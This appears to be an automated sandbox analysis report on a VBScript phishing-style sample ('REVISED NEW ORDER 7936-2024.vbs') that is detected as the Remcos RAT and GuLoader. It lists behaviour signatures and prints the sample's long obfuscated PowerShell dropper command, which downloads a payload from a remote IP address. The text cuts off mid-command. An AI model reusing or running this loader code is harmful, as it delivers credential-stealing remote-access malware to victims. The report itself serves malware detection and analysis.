Edit tour
Windows
Analysis Report
REVISED NEW ORDER 7936-2024.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes many files with high entropy
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1612 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\REVIS ED NEW ORD ER 7936-20 24.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6868 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Nedskriv ningstidsp unkter = 1 ;$Hotplate ='S';$Hotp late+='ubs trin';$Hot plate+='g' ;Function Andelskapi tals($Hent ningens){$ Stadsgartn erne167=$H entningens .Length-$N edskrivnin gstidspunk ter;For($P erifere=6; $Perifere -lt $Stad sgartnerne 167; $Peri fere+=(7)) {$Lungfish es+=$Hentn ingens.$Ho tplate.Inv oke( $Peri fere, $Ned skrivnings tidspunkte r);}$Lungf ishes;}fun ction Ordo nnant($spl atcher){& ($Typ echecke) ( $splatcher );}$Nonlov er=Andelsk apitals ' Sys.aMG ou ndo hypopz Hast.eiMet acrlP,nktu lE,sekuaUd fore/Salva .5F.lked.S to.mh0Bjer ge Slips ( C llutWBa aviiout,ab nSpearmdBa sisaoGustn eweuryprs ,nsyn ,ela arNCor ndT Dec,nc Ign ,r1meadwo0 Insali.Ryg skk0.ceptr ;,eutro Ca mporWRevei liBetalin Co,pl6 Shy es4Bra in; Tegn,f Fje rn,xAmmoni 6Ch.ysa4 P s ud;Cheme h Trichor BefrdvTril li:degend1 Archse2r m mea1Shrimp .Macada0 S mrke)No lo c RidderGT reskieUhjt ,dc Paasyk SkurveoUnp in/Introd 2Sulted0H. hcer1 fiks .0Missan0 Ulpko1Elec t,0 Uds,i1 Her.is Lag er.FAntipr iSams.er D unfie Vari mfsndrerou ninvexBrod er/Fleece1 Ste ku2Fon ot,1Frigin .Oblige0Au ifo ';$St aser112=An delskapita ls 'L.gest UPostkasAl kohoe.nlai dr rero-Ka .ensAGalde sgE.dosaeU nsof ncou. tet Garvn ';$tamari= Andelskapi tals ' Wic ,ihSkridtt FlisebtFli nkepRelaks :Spis k/Ca blem/ esew s8C.efsa7D rame,. Ube hv1Startl2 Dishi1 Ma rch. nrum1 Unbed0Aar lig5G psba .Pr.duk1Op teg 8 Oply s4Periv,/N eoclaUD,ta bedOmnifav Kas,ageCo. logjRetsha nWhatsiiAl vildnO,gav eg Cleweec owgirrSkri v,nPensioe Miracs Me .pa.Spinul aBovrupafo rsknfDi.nd r ';$Unhes itatively= Andelskapi tals ' Jul ea>Rhizop ';$Typeche cke=Andels kapitals ' OrfedeiShy esseBesrge x Fr.tt '; $Boblegumm iets142='F lyverdragt erne';Ordo nnant (And elskapital s 'Plast.S Cancane So ciat Udraa -wa,tebCAt avisoRek.r snDiskoft Ild,leTran svnGu.delt Relosi Dok ,me-Sla,ge POuttroaB. kebitNowts chSam.en i ndtjTKalib r:Torlek\T itre,HProl epaSmokehn Vand.ok Id io nMexica sBek ftv D ibensRokke snTjreple Abstrt oca masCharla3 Myelof4Aar gan.Photo t PickaxUl ydigt,ormo n Swith-Gu tturVCalo, iaVoltenl Khaf uGa b iee A,tim ortjn$Mcna ugBC.llefo nthrbSksf orltoldfoe KommutgObl igauThugge mSpaltemso nnibiLappe detinta.t AttessAm.e st1Noncoo4 ecidi2Car iam;Capafa ');Ordonn ant (Andel skapitals ',ostvsiOm fo.mftiaar s Change(T m erftLakk edeHasenss TuvaltA,v ask- Ascen p Tes,uaAp riortAcron yhGylden r itonT Mini m:Bund l\K .pitaHalva rsa Te.ron G,netkSti cklnHol,af s gurnav n vades .red in specieD ammust rot tesKlassi3 Sgneda4 Se rie.Fi.klv tRhinanxbr easttMulti m)Sp,uci{M iniste Br. dexGrundvi Ndringt Sp rog}Doreth ;R.cipr ') ;$Nonenvio us = Andel